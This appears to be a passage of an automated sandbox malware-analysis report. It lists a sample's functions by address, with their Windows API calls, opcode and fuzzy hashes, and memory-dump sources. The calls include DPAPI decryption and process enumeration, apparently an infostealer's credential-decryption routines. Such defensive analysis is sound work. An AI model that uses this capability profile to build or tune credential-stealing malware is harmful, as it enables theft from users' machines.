                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$System$File$ExitProcesssscanf
                      • String ID:
                      • API String ID: 2533653975-0
                      • Opcode ID: 044906c70716d6c9e4f3f017141667e0001202e9ef5c4456216be57deeb9db64
                      • Instruction ID: 6402aa170e0894e65fa6103ee2bc0a37396b474bcfd85b6ab41c772c6bbb0deb
                      • Opcode Fuzzy Hash: 044906c70716d6c9e4f3f017141667e0001202e9ef5c4456216be57deeb9db64
                      • Instruction Fuzzy Hash: 3A21DFB5D14208ABCF44EFE4D9459EEB7B6FF48300F04856EE51AE3250EB346605CB69
                      Function 00467240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0046724D
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00467254
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00467281
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 004672A4
                      • LocalFree.KERNEL32(?), ref: 004672AE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                      • String ID:
                      • API String ID: 2609814428-0
                      • Opcode ID: 1fc0e15e8e9dd471d46758bc07de5cbf66becb9e98edc4a5fd1e10583152d794
                      • Instruction ID: d0af482d3d6458cecc34919a70b42974c96500ce112393a6fc19df1ac9a1f487
                      • Opcode Fuzzy Hash: 1fc0e15e8e9dd471d46758bc07de5cbf66becb9e98edc4a5fd1e10583152d794
                      • Instruction Fuzzy Hash: 3F0100B5A40208BBDB10DFD4CD45F9E77B9AB44B04F104555FB05AA2C0D774BA01CB66
                      Function 00479600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0047961E
                      • Process32First.KERNEL32(00480ACA,00000128), ref: 00479632
                      • Process32Next.KERNEL32(00480ACA,00000128), ref: 00479647
                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0047965C
                      • CloseHandle.KERNEL32(00480ACA), ref: 0047967A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: 58557afe91be926143424cfe7e55dbea37c365a8d24e678008722ff552e39980
                      • Instruction ID: 2dafbae89f9dc876e26182dab14b2ac15c804c3ef6ea951b08930d7c3ecec42c
                      • Opcode Fuzzy Hash: 58557afe91be926143424cfe7e55dbea37c365a8d24e678008722ff552e39980
                      • Instruction Fuzzy Hash: 7C011E75A00208EBCB15DFA5CD48BEEB7F9EB48300F10828AA90A97240D738AF45CF51
                      Function 0083175A Relevance: 6.6, Strings: 4, Instructions: 1645COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !kv$=m>$^o]$jQ+<
                      • API String ID: 0-824214078
                      • Opcode ID: 052f6b18038a68d335fea7c02112cb997dd5f8613ad883d2068c85ee814e5c03
                      • Instruction ID: 9445457019fc6aff9cf5c4a60815e64682d0587213162a2f38c4654f85c96903
                      • Opcode Fuzzy Hash: 052f6b18038a68d335fea7c02112cb997dd5f8613ad883d2068c85ee814e5c03
                      • Instruction Fuzzy Hash: 5EB229F3A0C214AFE3046E2DEC8567BBBE9EFD4620F1A453DEAC4C3744E57598018692
                      Function 00478EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptBinaryToStringA.CRYPT32(00000000,00465184,40000001,00000000,00000000,?,00465184), ref: 00478EC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: BinaryCryptString
                      • String ID:
                      • API String ID: 80407269-0
                      • Opcode ID: b929bdcc1f425b4ca6a159c48f10760bc50cfe6ef8e87ca48bb643831f224e31
                      • Instruction ID: f78b70e1b7429f98fa02f03cf4c5000eac8c4801a0ce16447a2478282081a7bb
                      • Opcode Fuzzy Hash: b929bdcc1f425b4ca6a159c48f10760bc50cfe6ef8e87ca48bb643831f224e31
                      • Instruction Fuzzy Hash: 48110A70240205AFDB00DFA4D888FAB33AAAF89714F10E549F9198B250DB39E841DF65
                      Function 00477A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E8DA40,00000000,?,00480E10,00000000,?,00000000,00000000), ref: 00477A63
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00477A6A
                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E8DA40,00000000,?,00480E10,00000000,?,00000000,00000000,?), ref: 00477A7D
                      • wsprintfA.USER32 ref: 00477AB7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                      • String ID:
                      • API String ID: 3317088062-0
                      • Opcode ID: 29db0a76c5ece4b8b0f44d8bec1eaf980bb24c652c5781b262b3e394886e013f
                      • Instruction ID: 3e518c5ca2fc0acc09700d27725b686db9c352735568c3ca49dffaf8745e8c67
                      • Opcode Fuzzy Hash: 29db0a76c5ece4b8b0f44d8bec1eaf980bb24c652c5781b262b3e394886e013f
                      • Instruction Fuzzy Hash: C81182B1945218DBEB209F54DC45F99B778FB05711F1047DAE90A932C0C7786E40CF55
                      Function 00473720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                      Download Yara Rule
                      APIs
                      • CoCreateInstance.COMBASE(0047E118,00000000,00000001,0047E108,00000000), ref: 00473758
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004737B0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID:
                      • API String ID: 123533781-0
                      • Opcode ID: 9bd8d2dad7d55ef82cbd4d9c92155cdccd7603e0f68319a068869ac49009372d
                      • Instruction ID: 40f89dcfd4bee8ee1e5e89e3de85479f6d9598a78233cf68863449dbf93515e1
                      • Opcode Fuzzy Hash: 9bd8d2dad7d55ef82cbd4d9c92155cdccd7603e0f68319a068869ac49009372d
                      • Instruction Fuzzy Hash: C7410770A00A289FDB24DF58CC95BDBB7B5BB48306F4081D9E608EB290D771AE85CF51
                      Function 00469B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                      Download Yara Rule
                      APIs
                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00469B84
                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 00469BA3
                      • LocalFree.KERNEL32(?), ref: 00469BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$AllocCryptDataFreeUnprotect
                      • String ID:
                      • API String ID: 2068576380-0
                      • Opcode ID: 58871e53e6618eee25a24afb3f3c05bc8c8d8b21c40c1e96abcf8756a4a91602
                      • Instruction ID: 2bb95dc413f865b69bde54ac921f547ab4f6753b1740f467acb35706008ae465
                      • Opcode Fuzzy Hash: 58871e53e6618eee25a24afb3f3c05bc8c8d8b21c40c1e96abcf8756a4a91602
                      • Instruction Fuzzy Hash: 9311C9B8A00209EFDB04DF94D985AAFB7B9FF89700F104599E915A7350D774AE10CFA2
                      Function 0082C50D Relevance: 4.2, Strings: 2, Instructions: 1665COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: MU$r^
                      • API String ID: 0-3269954404
                      • Opcode ID: d24695b936d24290f46b545f1884aa233a65042747edc6b5720ee73ef3a7578a
                      • Instruction ID: 8c3b0b5f35b115e31e8a8cf1b39f4377721f2e7d62c11c572fe2fafc8f9d8f25
                      • Opcode Fuzzy Hash: d24695b936d24290f46b545f1884aa233a65042747edc6b5720ee73ef3a7578a
                      • Instruction Fuzzy Hash: 5DB229F3A0C2049FE3046E2DEC8567ABBE9EF94320F16493DEAC4C7744EA3558458697
                      Function 007866B3 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #d.o$#d.o$S'n]
                      • API String ID: 0-1842126938
                      • Opcode ID: c3fbcc7fae8351a59e645d56b87fec0fe0117d524581411100477f71d5146655
                      • Instruction ID: f87cef14687fa60ef9105b53a33fce936e6fb4d9c3c916408a4cfeb4f6fc2f1e
                      • Opcode Fuzzy Hash: c3fbcc7fae8351a59e645d56b87fec0fe0117d524581411100477f71d5146655
                      • Instruction Fuzzy Hash: 646123F3A082005BE70C6E3DEC9977ABAD6DBD5320F1B463DA795C77C0E93848058296
                      Function 00834CDE Relevance: 2.9, Strings: 1, Instructions: 1650COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: wY
                      • API String ID: 0-526496422
                      • Opcode ID: 205f2ea0c0d683df2366fa61ee9b1c8fee7cb1f641e67760fc5ce8b0227243d6
                      • Instruction ID: 01f55dc64fd82fed32067a8d0d56c9eaa02a41593a691b15f78f7e46d3f904bd
                      • Opcode Fuzzy Hash: 205f2ea0c0d683df2366fa61ee9b1c8fee7cb1f641e67760fc5ce8b0227243d6
                      • Instruction Fuzzy Hash: B9B228F360C6049FE304AE2DEC8567AF7E9EF94720F16493DEAC4C3740EA7598058696
                      Function 0082E095 Relevance: 2.8, Strings: 1, Instructions: 1599COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: r>y
                      • API String ID: 0-3173497869
                      • Opcode ID: f287669d1038235c5982cf4779a92483f723e06df1000467b13736cdc343c2ec
